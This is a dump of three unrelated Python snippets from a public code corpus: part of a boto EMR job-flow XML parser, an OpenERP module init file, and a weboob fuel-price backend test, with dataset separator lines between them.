    def startElement(self, name, attrs, connection):
        # Delegate parsing of the nested argument list to a ResultSet;
        # any other element returns None (default handling).
        if name != 'Args':
            return None
        self.args = ResultSet([('member', Arg)])
        return self.args
class JobFlow(EmrObject):
    """A job flow description from an EMR DescribeJobFlows response.

    ``Fields`` lists the simple (text-only) XML elements the parser
    stores directly as attributes; the nested ``<Steps>`` list is
    handled by :meth:`startElement`.
    """

    # BUG FIX: the original literal listed 'InstanceCount' twice; the
    # duplicate is dropped (a set cannot hold it twice anyway).  Both
    # 'KeepJobAliveWhenNoSteps' and 'KeepJobFlowAliveWhenNoSteps' are
    # kept deliberately — presumably the service has used both
    # spellings; verify against the EMR API before removing either.
    Fields = {
        'CreationDateTime',
        'StartDateTime',
        'State',
        'EndDateTime',
        'Id',
        'InstanceCount',
        'JobFlowId',
        'KeepJobAliveWhenNoSteps',
        'KeepJobFlowAliveWhenNoSteps',
        'LogURI',
        'MasterPublicDnsName',
        'MasterInstanceId',
        'Name',
        'Placement',
        'RequestId',
        'Type',
        'Value',
        'AvailabilityZone',
        'SlaveInstanceType',
        'MasterInstanceType',
        'Ec2KeyName',
    }

    def __init__(self, connection=None):
        self.connection = connection
        # Populated with a ResultSet of Step when a <Steps> element is seen.
        self.steps = None

    def startElement(self, name, attrs, connection):
        # Delegate parsing of the nested <Steps> list to a ResultSet.
        if name == 'Steps':
            self.steps = ResultSet([('member', Step)])
            return self.steps
        else:
            return None
|
unknown
|
codeparrot/codeparrot-clean
| ||
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import project_report
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
unknown
|
codeparrot/codeparrot-clean
| ||
# -*- coding: utf-8 -*-
# Copyright(C) 2012 Romain Bignon
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
from weboob.tools.test import BackendTest
class PrixCarburantsTest(BackendTest):
    """Live backend test for the 'prixcarburants' module."""

    BACKEND = 'prixcarburants'

    def test_prixcarburants(self):
        # Searching for 'gpl' is expected to yield exactly one product;
        # then fetch its prices and fill the first result's lazy fields.
        matches = list(self.backend.search_products('gpl'))
        self.assertTrue(len(matches) == 1)
        price_list = list(self.backend.iter_prices(matches[0]))
        self.backend.fillobj(price_list[0])
|
unknown
|
codeparrot/codeparrot-clean
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.